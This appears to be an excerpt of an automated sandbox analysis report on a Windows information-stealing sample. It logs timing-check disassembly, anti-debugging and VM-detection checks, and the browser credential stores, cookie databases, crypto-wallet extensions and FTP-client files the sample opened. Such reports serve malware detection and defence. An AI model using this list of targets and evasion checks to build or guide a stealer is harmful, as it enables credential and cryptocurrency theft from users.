            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D03 second address: 4A10DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 jmp 00007F2E7D1D3446h 0x00000017 popad 0x00000018 test esi, esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F2E7D1D343Eh 0x00000021 sbb ah, 00000058h 0x00000024 jmp 00007F2E7D1D343Bh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F2E7D1D3448h 0x00000030 sbb ah, FFFFFFB8h 0x00000033 jmp 00007F2E7D1D343Bh 0x00000038 popfd 0x00000039 popad 0x0000003a je 00007F2EEE800A77h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov bh, 12h 0x00000045 pushfd 0x00000046 jmp 00007F2E7D1D343Ch 0x0000004b add esi, 6519B918h 0x00000051 jmp 00007F2E7D1D343Bh 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DA1 second address: 4A10E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D257EBFh 0x00000008 pushfd 0x00000009 jmp 00007F2E7D257EC8h 0x0000000e sub ecx, 7D46DAA8h 0x00000014 jmp 00007F2E7D257EBBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp dword ptr [760A459Ch], 05h 0x00000024 jmp 00007F2E7D257EC6h 0x00000029 je 00007F2EEE89D54Fh 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E0A second address: 4A10E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E10 second address: 4A10E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E7D257EC1h 0x00000009 jmp 00007F2E7D257EBBh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E3B second address: 4A10E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E3F second address: 4A10E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E5A second address: 4A10E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D1D3442h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F2E7D1D343Bh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E85 second address: 4A10E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E8B second address: 4A10E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E91 second address: 4A10E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 2859D8 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 433412 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\file.exe TID: 6564 Thread sleep time: -30015s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 6832 Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 6832 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exe File opened: NTICE
            Source: C:\Users\user\Desktop\file.exe File opened: SICE
            Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
            Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
            Source: file.exe, file.exe, 00000000.00000002.1193856188.000000000040A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0yProgram Manager
            Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187560030.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
            Source: Yara match File source: 0.2.file.exe.220000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
            Source: file.exe String found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
            Source: file.exe, 00000000.00000003.1136637956.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1136637956.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
            Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
